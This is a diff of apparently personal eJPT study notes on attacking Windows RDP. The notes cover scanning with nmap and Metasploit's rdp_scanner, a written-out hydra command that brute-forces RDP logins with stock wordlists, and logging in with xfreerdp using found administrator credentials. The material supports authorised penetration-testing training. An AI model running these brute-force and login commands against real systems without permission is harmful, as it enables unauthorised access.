Miss-ikky/Mywiki/EJPT/Host & Network Penetration Testing/1. System and hostbased attacks/Windows/Windows Vulnerabilities.md

 - Perform `nmap scan - port scan` on target
   OR
 - ` service postgresql ``start &&msfconsole`
-- `search rdp_scanner` (aux/scanner/rdp/rdp_scanner), set options
+- `search rdp_scanner` (`aux/scanner/rdp/rdp_scanner`), set options

 Bruteforce rdp
 - Use hydra: `**hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://targetip  -s rdp'port**`
-	- you can reduce the bruteforce speed with hydra,the default is 16 but you can change it to make sure that you dont cause damage to the customer you are pentesting
+	- you can reduce the bruteforce speed with hydra, the default is 16 but you can change it to make sure that you don't cause damage to the customer you are pentesting
 	- you need to add -s the port because if you do not add the port it will assume the default rdp port
 - authenticate with credentials found in target: `xfreerdp /u:administrator /p:qwertyuiop /v:targetip `
 	- `xfreerdp`: This is the command to launch the FreeRDP client. used to initiate a remote desktop session - It will establish a graphical connection to the remote system, allowing you to interact with its desktop environment as if you were physically present at that machine.